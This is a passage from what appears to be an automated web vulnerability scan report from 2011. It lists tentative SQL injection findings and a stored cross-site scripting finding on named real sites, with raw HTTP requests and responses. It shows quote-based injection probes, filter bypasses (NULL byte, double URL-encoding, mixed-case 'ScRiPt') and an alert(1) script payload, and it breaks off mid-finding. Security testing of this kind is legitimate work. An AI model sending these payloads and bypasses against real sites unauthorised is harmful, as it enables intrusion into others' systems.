Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:26:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6890

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Mar 03 16:23:16 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/998766/1015_300x250_Promo_FreePhone_SamsungGravityTv2_Stnd.swf";
var gif = "http://s0.2mdn.net/998766/1015_300x250_Promo_FreePhone_SamsungGravityTv2_Static.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/x%3B236462304%3B1-0%3B0%3B59988977%3B4307-300/250%3B40710683/40728470/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=Samsung-Gravity-T&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjC7yzMbfY%20aCjCdyww%20VtBEwl");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/x%3B236462304%3B1-0%3B0%3B59988977%3B4307-300/250%3B40710683/40728470/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=Samsung-Gravity-T&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjC7yzMbfY%20aCjCdyww%20VtBEwl");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.l
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N5621.66.2412875475321/B4682155

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /adi/N5621.66.2412875475321/B4682155;sz=728x90;;click=http://yads.zedo.com/ads2/c?a=914396%3Bn=1219%3Bx=24093%3Bc=1219000054,1219000049%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=jhmxpQoBADYAAET@BzgAAAAW~022111%3Bk%3D;ord=0.5315556428395212?%00' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:14:24 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:14:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6809

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adi/N5621.66.2412875475321/B4682155;sz=728x90;;click=http://yads.zedo.com/ads2/c?a=914396%3Bn=1219%3Bx=24093%3Bc=1219000054,1219000049%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=jhmxpQoBADYAAET@BzgAAAAW~022111%3Bk%3D;ord=0.5315556428395212?%00'' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:14:25 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:14:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 827

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/c/b8/%2a/a
...[SNIP]...

1.3. https://store.port80software.com/cart/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.port80software.com
Path:   /cart/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /cart/ HTTP/1.1
Host: store.port80software.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16%2527
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; __utmc=250101639; __utmb=250101639.1.10.1300635924; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; wooMeta=MjMxMDAmMSYwJjIwJjEzMDA2MzU5MTA2MjMmMTMwMDYzNTkxMDYyMyYmMTAwJiY1MDAwNzkmJiYm

Response 1

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 8958

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>store.po
...[SNIP]...
<a href='getting/src/vessels.html'>failed.</a>
...[SNIP]...

Request 2

GET /cart/ HTTP/1.1
Host: store.port80software.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16%2527%2527
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; __utmc=250101639; __utmb=250101639.1.10.1300635924; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; wooMeta=MjMxMDAmMSYwJjIwJjEzMDA2MzU5MTA2MjMmMTMwMDYzNTkxMDYyMyYmMTAwJiY1MDAwNzkmJiYm

Response 2

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 2407

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>store.po
...[SNIP]...

1.4. http://www.port80software.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.port80software.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.port80software.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMSYxJjI0MjA0NyYxMzAwNjM1OTEwNjIzJjEzMDA2MzYxNTI2NTAmJjEwMCYmNTAwMDc5JiYmJg==; countrycode=XX

Response 1

HTTP/1.1 500 Internal Server Error
Set-Cookie: 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=437708F63896EFEBBD4FA26D4BBFB1202F4FCF35; path=/; HttpOnly;
Content-Type: text/html
Content-Length: 8053

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>www.port
...[SNIP]...
<H2> "I have not failed. I've just found 10,000 ways that won't work." -<a href='../servlet/nature/first'>
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.port80software.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMSYxJjI0MjA0NyYxMzAwNjM1OTEwNjIzJjEzMDA2MzYxNTI2NTAmJjEwMCYmNTAwMDc5JiYmJg==; countrycode=XX

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 20 Mar 2011 17:02:01 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDASTASRQD=DAIKIALCFAPJCAFOKFDFEKGL; path=/
Set-Cookie: 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=09C55D26877C72426084F1DE8284520DA0364363; path=/; HttpOnly;
Vary: Accept-Encoding
Content-Length: 22219


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

1.5. http://www.port80software.com/products/linkdeny/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.port80software.com
Path:   /products/linkdeny/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /products/linkdeny/ HTTP/1.1
Host: www.port80software.com
Proxy-Connection: keep-alive
Referer: http://www.port80software.com/products/httpzip/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; countrycode=XX; ASPSESSIONIDASTASRQD=BCHKIALCFLJKPDPCIFCIKJNC; 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=E79D4808F36AEEF660B56D1324C5F5C0B60FFB37; PINT_CT_CLIENT_RND=0.1859149904921651; PINT_CT_CLIENT_ID=11022012012658; PINT_CT_EXIT_TS=1300640492263; __utma=250101639.1362439743.1300635924.1300635924.1300640487.2; __utmc=250101639%2527; __utmb=250101639.3.10.1300640487; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMiY0JjI4NzI4MiYxMzAwNjM1OTEwNjIzJjEzMDA2NDA1MTUyODAmJjEwMCYmNTAwMDc5JiYmJg==

Response 1

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 8592

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>www.port
...[SNIP]...
<H3> "I have not failed. I've just found 10,000 ways that won't work."<a href='little.php?id=25911&pg=1940'>
...[SNIP]...

Request 2

GET /products/linkdeny/ HTTP/1.1
Host: www.port80software.com
Proxy-Connection: keep-alive
Referer: http://www.port80software.com/products/httpzip/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; countrycode=XX; ASPSESSIONIDASTASRQD=BCHKIALCFLJKPDPCIFCIKJNC; 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=E79D4808F36AEEF660B56D1324C5F5C0B60FFB37; PINT_CT_CLIENT_RND=0.1859149904921651; PINT_CT_CLIENT_ID=11022012012658; PINT_CT_EXIT_TS=1300640492263; __utma=250101639.1362439743.1300635924.1300635924.1300640487.2; __utmc=250101639%2527%2527; __utmb=250101639.3.10.1300640487; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMiY0JjI4NzI4MiYxMzAwNjM1OTEwNjIzJjEzMDA2NDA1MTUyODAmJjEwMCYmNTAwMDc5JiYmJg==

Response 2

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 2195

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>www.port
...[SNIP]...

1.6. http://www.port80software.com/products/serverdefender/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.port80software.com
Path:   /products/serverdefender/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /products/serverdefender/ HTTP/1.1
Host: www.port80software.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; countrycode=XX; PINT_CT_CLIENT_RND=0.1859149904921651; PINT_CT_CLIENT_ID=11022012012658; PINT_CT_EXIT_TS=1300640492263; __utma=250101639.1362439743.1300635924.1300635924.1300640487.2; __utmc=250101639; __utmb=250101639.4.10.1300640487; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMiY1JjM1NTI2MyYxMzAwNjM1OTEwNjIzJjEzMDA2NDA1ODMyNjEmJjEwMCYmNTAwMDc5JiYmJg==

Response 1

HTTP/1.1 500 Internal Server Error
Set-Cookie: 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=D4DFA614C22A9974FB3BEE18CCC54C19902ED16C; path=/; HttpOnly;
Content-Type: text/html
Content-Length: 6336

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>www.port
...[SNIP]...
<TD> "I have not failed. I've just found 10,000<a href='beauty?template=.shtml&id=30611&template=.php&item=18783&template=.jsp'>
...[SNIP]...

Request 2

GET /products/serverdefender/ HTTP/1.1
Host: www.port80software.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; countrycode=XX; PINT_CT_CLIENT_RND=0.1859149904921651; PINT_CT_CLIENT_ID=11022012012658; PINT_CT_EXIT_TS=1300640492263; __utma=250101639.1362439743.1300635924.1300635924.1300640487.2; __utmc=250101639; __utmb=250101639.4.10.1300640487; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMiY1JjM1NTI2MyYxMzAwNjM1OTEwNjIzJjEzMDA2NDA1ODMyNjEmJjEwMCYmNTAwMDc5JiYmJg==

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 20 Mar 2011 17:10:24 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDASTASRQD=DOJKIALCLJOPLBODBABGOAGD; path=/
Set-Cookie: 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=560BA4A63B91F2E0D7B8A37F26C006E44B90C66F; path=/; HttpOnly;
Vary: Accept-Encoding
Content-Length: 10675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<he
...[SNIP]...

1.7. https://www.port80software.com/images/N_support.gif [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.port80software.com
Path:   /images/N_support.gif

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /images/N_support.gif HTTP/1.1
Host: www.port80software.com
Connection: keep-alive
Referer: https://www.port80software.com/myport80/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16%00'
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countrycode=XX; ASPSESSIONIDASTASRQD=APFKIALCEBKFIHEPICMLDDNN; 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=F22A36D4532A65A750589D51FAA2D650D7C2867E; __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; __utmc=250101639; __utmb=250101639.1.10.1300635924; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMSYxJjYwNTgzJjEzMDA2MzU5MTA2MjMmMTMwMDYzNTk3MTE4NiYmMTAwJiY1MDAwNzkmJiYm

Response 1

HTTP/1.0 404 Not Found
Set-Cookie: 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=;path=/;Max-Age=0
Set-Cookie: ASPSESSIONIDASTASRQD=;path=/;Max-Age=0
Content-Type: text/html
Content-Length: 4751

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>www.port
...[SNIP]...
<H1>"I have not failed. I've just found 10,000 ways that won't work." - Thomas Alva Edison</H1>
...[SNIP]...

Request 2

GET /images/N_support.gif HTTP/1.1
Host: www.port80software.com
Connection: keep-alive
Referer: https://www.port80software.com/myport80/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16%00''
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countrycode=XX; ASPSESSIONIDASTASRQD=APFKIALCEBKFIHEPICMLDDNN; 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=F22A36D4532A65A750589D51FAA2D650D7C2867E; __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; __utmc=250101639; __utmb=250101639.1.10.1300635924; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMSYxJjYwNTgzJjEzMDA2MzU5MTA2MjMmMTMwMDYzNTk3MTE4NiYmMTAwJiY1MDAwNzkmJiYm

Response 2

HTTP/1.0 404 Not Found
Set-Cookie: 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=;path=/;Max-Age=0
Set-Cookie: ASPSESSIONIDASTASRQD=;path=/;Max-Age=0
Content-Type: text/html
Content-Length: 2167

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>www.port
...[SNIP]...

2. Cross-site scripting (stored)  previous  next
There are 26 instances of this issue:


2.1. http://order.1and1.com/xml/order/CloudDynamicServer [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/CloudDynamicServer is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/CloudDynamicServer. The payload be5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 was submitted in the REST URL parameter 3. This input was returned as be5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 in a subsequent request for the URL /xml/order/CloudDynamicServer.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/CloudDynamicServerbe5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

